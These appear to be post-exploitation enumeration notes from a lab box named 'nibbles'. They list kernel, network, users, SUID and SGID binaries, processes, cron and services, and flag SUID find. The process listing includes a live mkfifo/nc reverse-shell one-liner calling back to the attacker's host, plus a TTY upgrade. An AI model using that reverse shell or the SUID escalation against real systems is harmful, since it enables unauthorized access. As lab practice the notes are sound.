System/Kernel


postgres@nibbles:/var/lib/postgresql/11/main$ uname -a ; cat /etc/*release
Linux nibbles 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
  • 4.19.0-8-amd64
  • x86_64
  • Debian GNU/Linux 10 (buster)

Networks


postgres@nibbles:/var/lib/postgresql/11/main$ ip route ; arp -a
default via 192.168.148.254 dev ens192 onlink 
192.168.148.0/24 dev ens192 proto kernel scope link src 192.168.148.47 
? (192.168.148.254) at 00:50:56:9e:fc:4d [ether] on ens192
postgres@nibbles:/var/lib/postgresql/11/main$ netstat -antup4
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:5437            0.0.0.0:*               LISTEN      533/postgres        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 192.168.148.47:5437     192.168.45.245:47208    ESTABLISHED 1496/postgres: 11/m 
tcp        0    301 192.168.148.47:60534    192.168.45.245:5437     ESTABLISHED 1586/nc             
udp        0      0 127.0.0.1:45625         127.0.0.1:45625         ESTABLISHED 533/postgres        

Users & Groups


postgres@nibbles:/var/lib/postgresql/11/main$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
wilson:x:1000:1000:wilson,,,:/home/wilson:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
postgres:x:106:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
Debian-snmp:x:107:114::/var/lib/snmp:/bin/false
ftp:x:108:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
total 12K
4.0K drwxr-xr-x  4 wilson wilson 4.0K Jul  9  2020 wilson
4.0K drwxr-xr-x  3 root   root   4.0K Apr 27  2020 .
4.0K drwxr-xr-x 18 root   root   4.0K Apr 27  2020 ..

  • wilson

postgres@nibbles:/var/lib/postgresql/11/main$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(wilson) gid=1000(wilson) groups=1000(wilson),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)
uid=107(Debian-snmp) gid=114(Debian-snmp) groups=114(Debian-snmp)
uid=108(ftp) gid=117(ftp) groups=117(ftp)
  • uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)
  • uid=1000(wilson) gid=1000(wilson) groups=1000(wilson),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

SUIDs


postgres@nibbles:/var/lib/postgresql/11/main$ find / -perm -04000 -ls -type f 2>/dev/null
   137358     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
    19052    428 -rwsr-xr-x   1 root     root       436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
    15602     52 -rwsr-xr--   1 root     messagebus    51184 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
      282     56 -rwsr-xr-x   1 root     root          54096 Jul 27  2018 /usr/bin/chfn
      286     64 -rwsr-xr-x   1 root     root          63736 Jul 27  2018 /usr/bin/passwd
      285     84 -rwsr-xr-x   1 root     root          84016 Jul 27  2018 /usr/bin/gpasswd
      283     44 -rwsr-xr-x   1 root     root          44528 Jul 27  2018 /usr/bin/chsh
    34845     36 -rwsr-xr-x   1 root     root          34896 Jan  7  2019 /usr/bin/fusermount
     3838     44 -rwsr-xr-x   1 root     root          44440 Jul 27  2018 /usr/bin/newgrp
      261     64 -rwsr-xr-x   1 root     root          63568 Jan 10  2019 /usr/bin/su
     4071     52 -rwsr-xr-x   1 root     root          51280 Jan 10  2019 /usr/bin/mount
     2248    312 -rwsr-xr-x   1 root     root         315904 Feb 16  2019 /usr/bin/find
    22663    156 -rwsr-xr-x   1 root     root         157192 Feb  2  2020 /usr/bin/sudo
     4073     36 -rwsr-xr-x   1 root     root          34888 Jan 10  2019 /usr/bin/umount

  • 2248 312 -rwsr-xr-x 1 root root 315904 Feb 16 2019 /usr/bin/find

SGIDs


postgres@nibbles:/var/lib/postgresql/11/main$ find / -type f -perm -02000 -ls 2>/dev/null
      284     32 -rwxr-sr-x   1 root     shadow      31000 Jul 27  2018 /usr/bin/expiry
      281     72 -rwxr-sr-x   1 root     shadow      71816 Jul 27  2018 /usr/bin/chage
    19045    316 -rwxr-sr-x   1 root     ssh        321672 Jan 31  2020 /usr/bin/ssh-agent
    15839     20 -rwxr-sr-x   1 root     mail        18944 Dec  3  2017 /usr/bin/dotlockfile
     6011     16 -rwxr-sr-x   1 root     tty         14736 May  4  2018 /usr/bin/bsd-write
     1872     36 -rwxr-sr-x   1 root     tty         34896 Jan 10  2019 /usr/bin/wall
     2137     44 -rwxr-sr-x   1 root     crontab     43568 Oct 11  2019 /usr/bin/crontab
     3043     40 -rwxr-sr-x   1 root     shadow      39616 Feb 14  2019 /usr/sbin/unix_chkpwd

Capabilities


postgres@nibbles:/var/lib/postgresql/11/main$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep

Processes


postgres@nibbles:/var/lib/postgresql/11/main$ ps -auxwww
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  1.0 103832 10112 ?        Ss   06:08   0:00 /sbin/init
root       252  0.0  0.7  40388  7976 ?        Ss   06:08   0:00 /lib/systemd/systemd-journald
root       272  0.0  0.5  22056  5116 ?        Ss   06:08   0:00 /lib/systemd/systemd-udevd
root       421  0.0  1.0  48220 10496 ?        Ss   06:09   0:00 /usr/bin/VGAuthService
root       422  0.0  1.2 122876 12292 ?        Ssl  06:09   0:03 /usr/bin/vmtoolsd
systemd+   423  0.0  0.6  93080  6516 ?        Ssl  06:09   0:00 /lib/systemd/systemd-timesyncd
root       425  0.0  0.6  19304  6300 ?        Ss   06:09   0:00 /lib/systemd/systemd-logind
message+   427  0.0  0.3   8988  3760 ?        Ss   06:09   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root       428  0.0  0.4 225824  4196 ?        Ssl  06:09   0:00 /usr/sbin/rsyslogd -n -iNONE
root       436  0.0  0.2   8504  2772 ?        Ss   06:09   0:00 /usr/sbin/cron -f
root       444  0.0  0.3   6620  3036 ?        Ss   06:09   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root       452  0.0  0.1   5612  1672 tty1     Ss+  06:09   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root       455  0.0  0.7  15852  7084 ?        Ss   06:09   0:00 /usr/sbin/sshd -D
root       496  0.0  0.4   8436  4752 ?        Ss   06:09   0:00 /usr/sbin/apache2 -k start
postgres   533  0.0  2.6 213456 27020 ?        S    06:09   0:00 /usr/lib/postgresql/11/bin/postgres -D /var/lib/postgresql/11/main -c config_file=/etc/postgresql/11/main/postgresql.conf
postgres   591  0.0  0.6 213556  6128 ?        Ss   06:09   0:00 postgres: 11/main: checkpointer   
postgres   592  0.0  0.5 213456  5920 ?        Ss   06:09   0:00 postgres: 11/main: background writer   
postgres   593  0.0  0.9 213456  9432 ?        Ss   06:09   0:00 postgres: 11/main: walwriter   
postgres   594  0.0  0.6 213864  6272 ?        Ss   06:09   0:00 postgres: 11/main: autovacuum launcher   
postgres   595  0.0  0.4  68512  4140 ?        Ss   06:09   0:00 postgres: 11/main: stats collector   
postgres   596  0.0  0.6 213864  6376 ?        Ss   06:09   0:00 postgres: 11/main: logical replication launcher   
www-data  1055  0.1  0.8 755888  8084 ?        Sl   06:11   0:13 /usr/sbin/apache2 -k start
www-data  1056  0.1  0.8 755888  8692 ?        Sl   06:11   0:13 /usr/sbin/apache2 -k start
postgres  1496  0.0  1.8 215404 18684 ?        Ss   07:21   0:00 postgres: 11/main: postgres postgres 192.168.45.245(47208) COPY
postgres  1584  0.0  0.0   2388   760 ?        S    08:11   0:00 sh -c mkfifo /tmp/inkzce; nc 192.168.45.245 5437 0</tmp/inkzce | /bin/sh >/tmp/inkzce 2>&1; rm /tmp/inkzce
postgres  1586  0.0  0.1   2372  1760 ?        S    08:11   0:00 nc 192.168.45.245 5437
postgres  1587  0.0  0.0   2388   696 ?        S    08:11   0:00 /bin/sh
postgres  1647  0.0  0.2   5556  2280 ?        S    08:28   0:00 script /dev/null -c bash
postgres  1648  0.0  0.0   2388   692 pts/0    Ss   08:28   0:00 sh -c bash
postgres  1649  0.0  0.3   6992  3748 pts/0    S    08:28   0:00 bash
postgres  1700  0.0  0.3  10916  3340 pts/0    R+   08:31   0:00 ps -auxwww
 
  • root 436 0.0 0.2 8504 2772 ? Ss 06:09 0:00 /usr/sbin/cron -f
  • postgres 533 0.0 2.6 213456 27020 ? S 06:09 0:00 /usr/lib/postgresql/11/bin/postgres -D /var/lib/postgresql/11/main -c config_file=/etc/postgresql/11/main/postgresql.conf

Cron & Systemd


postgres@nibbles:/var/lib/postgresql/11/main$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for postgres
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
 
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT                         LEFT     LAST                         PASSED       
Sat 2025-03-01 22:01:43 EST  13h left Sat 2025-03-01 06:11:15 EST  2h 25min ago 
Sun 2025-03-02 00:00:00 EST  15h left Sat 2025-03-01 06:11:15 EST  2h 25min ago 
Sun 2025-03-02 00:00:00 EST  15h left Sat 2025-03-01 06:11:15 EST  2h 25min ago 
Sun 2025-03-02 06:24:07 EST  21h left Sat 2025-03-01 06:24:07 EST  2h 12min ago 
Sun 2025-03-02 06:45:46 EST  22h left Sat 2025-03-01 06:11:15 EST  2h 25min ago 
 
5 timers listed.
Pass --all to see loaded but inactive timers, too.
lines 1-9/9 (END)

Services


postgres@nibbles:/var/lib/postgresql/11/main$ systemctl list-units --state=running
UNIT                            LOAD   ACTIVE SUB     DESCRIPTION              
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
init.scope                      loaded active running System and Service Manage
apache2.service                 loaded active running The Apache HTTP Server   
cron.service                    loaded active running Regular background progra
dbus.service                    loaded active running D-Bus System Message Bus 
getty@tty1.service              loaded active running Getty on tty1            
open-vm-tools.service           loaded active running Service for virtual machi
postgresql@11-main.service      loaded active running PostgreSQL Cluster 11-mai
rsyslog.service                 loaded active running System Logging Service   
ssh.service                     loaded active running OpenBSD Secure Shell serv
systemd-journald.service        loaded active running Journal Service          
systemd-logind.service          loaded active running Login Service            
systemd-timesyncd.service       loaded active running Network Time Synchronizat
systemd-udevd.service           loaded active running udev Kernel Device Manage
vgauth.service                  loaded active running Authentication service fo
vsftpd.service                  loaded active running vsftpd FTP server        
dbus.socket                     loaded active running D-Bus System Message Bus 
syslog.socket                   loaded active running Syslog Socket            
systemd-journald-audit.socket   loaded active running Journal Audit Socket     
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket         loaded active running Journal Socket           
systemd-udevd-control.socket    loaded active running udev Control Socket      
systemd-udevd-kernel.socket     loaded active running udev Kernel Socket       
 
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
 
23 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
lines 9-31/31 (END)   

Sudo Version


postgres@nibbles:/var/lib/postgresql/11/main$ sudo --version
Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27

  • Sudo version 1.8.27

Glibc Version


postgres@nibbles:/var/lib/postgresql/11/main$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

  • ldd (Debian GLIBC 2.28-10) 2.28